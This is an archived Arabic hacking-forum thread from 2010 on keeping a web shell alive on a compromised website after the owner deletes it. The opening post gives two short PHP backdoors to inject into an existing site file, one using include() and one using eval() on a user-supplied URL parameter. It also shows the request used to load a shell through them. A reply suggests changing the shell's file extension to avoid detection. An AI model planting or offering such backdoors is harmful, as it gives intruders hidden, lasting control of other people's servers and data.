:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات (http://www.vbspiders.com/vb/f38.html)
-   -   حل مشكلة حذف الشل من صاحب الموقع (http://www.vbspiders.com/vb/t34389.html)

ارساوي 08-11-2010 03:30 AM
حل مشكلة حذف الشل من صاحب الموقع
 
السلام عليكم ورحمة الله وبركاته ..

كيفكم ياحلوين ان شاء الله تمام ..

أحيانا يتم رفع الشل ولكن تجيه ثاني يوم تحصله محذوف سواء من صاحب الموقع أو صاحب السيرفر

ايش الحل ؟؟؟ نبي نرفع شل ونضمن بقاءه أطول فترة ممكنة بدون لفت نظر صاحب الموقع أو السيرفر..

الحل هو :

حقن كود بأحد ملفات الموقع [ ملاحظة : أنا قلت حقن مو تحذف كود الملف يعني مجرد اضافة للكود ]

هذا الكود معروف وهو يسبب ثغرة فايل انكلود للسيرفر ... بعد كذا تقوم بسحب الشل بصيغة txt

وهذا شي واضح للكل ...

للاصدار الرابع php 4

كود PHP:
<?php

$RxH $_GET['bullet'];

include ($RxH);

?>
للاصدار الخامس php 5

كود PHP:
<?php
if($_GET[bullet]){
$file=implode("\n",file($_GET[bullet]));
$bullet=str_replace("<?php""",$file);
$bullet=str_replace("<?""",$bullet);
$bullet=str_replace("?>""",$bullet);
eval($bullet);
}
?>

ملاحظة تأكد أولا من اصدار php واستعمل الكود المناسب ...

بالنسبة للاصدار الخامس نفرض وضعنا الكود في ملف وليكن اسمه sad.php

طريقة السحب كالتالي :


كود PHP:
www.site.com/sad.php?bullet=shell.txt
اتمنى تكون الطريقة هذى مفيدة لحل لمشاكل حذف الشل ...

the sn!per 08-11-2010 04:27 AM
[align=center][/align]مشكور اخ ارساوي عالموضوع الرائع

BayBi HaCk 08-11-2010 10:16 AM
thank you arsawi

BayBi HaCk 08-11-2010 10:17 AM
موضوع راءع من شخص اروع

BayBi HaCk 08-11-2010 10:18 AM
ا[motr]نيس قد مر من هنا ...[/motr]

BayBi HaCk 08-11-2010 10:18 AM
[motr]انيس قد مر من هنا ...[/motr]

عبد الله ر 08-11-2010 11:09 AM
مشكور على الدرس الرائع

KaLa$nikoV 08-11-2010 11:16 AM
مشكور ع الشرح يا غلا
بس بجب ازيد كلمه لو ممكن


عندك يفضل تطبق الثغره ع الموقع بعد ما تحقنها لانها مش دايما تنفع حتى الاصدار الخامس يرتبط الشل بس ما بتقدر ترفع ايا ملف


هون عندك حلول ثانيه باكواد الثغرات التانيه وكله هاد ارفقته بالدوره

لكن في طريقه لسا بعد ما ارففتها لانها مش معروفه ( من اكتشافي :$ )


لكن في كمان طريقه سهله وهي هتاكتتس تغير الامتداد

بنغير امتداد الشل من php الى مثلا cvo
وهيك ما رح يصيد الشل ولا يعرف ايش اهميتو بس لو دخل عليه راح يفتح معاه الشل وهاد اشي ما اتفقنا عليه :]

CODE3 08-11-2010 04:08 PM
مشكور على الدرس الرائع

ارساوي 08-13-2010 11:53 PM
اقتباس:

مشكور ع الشرح يا غلا
بس بجب ازيد كلمه لو ممكن


عندك يفضل تطبق الثغره ع الموقع بعد ما تحقنها لانها مش دايما تنفع حتى الاصدار الخامس يرتبط الشل بس ما بتقدر ترفع ايا ملف


هون عندك حلول ثانيه باكواد الثغرات التانيه وكله هاد ارفقته بالدوره

لكن في طريقه لسا بعد ما ارففتها لانها مش معروفه ( من اكتشافي :$ )


لكن في كمان طريقه سهله وهي هتاكتتس تغير الامتداد

بنغير امتداد الشل من php الى مثلا cvo
وهيك ما رح يصيد الشل ولا يعرف ايش اهميتو بس لو دخل عليه راح يفتح معاه الشل وهاد اشي ما اتفقنا عليه :]
كلام صحيح

ومنور يا قلبي


الساعة الآن 01:29 PM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0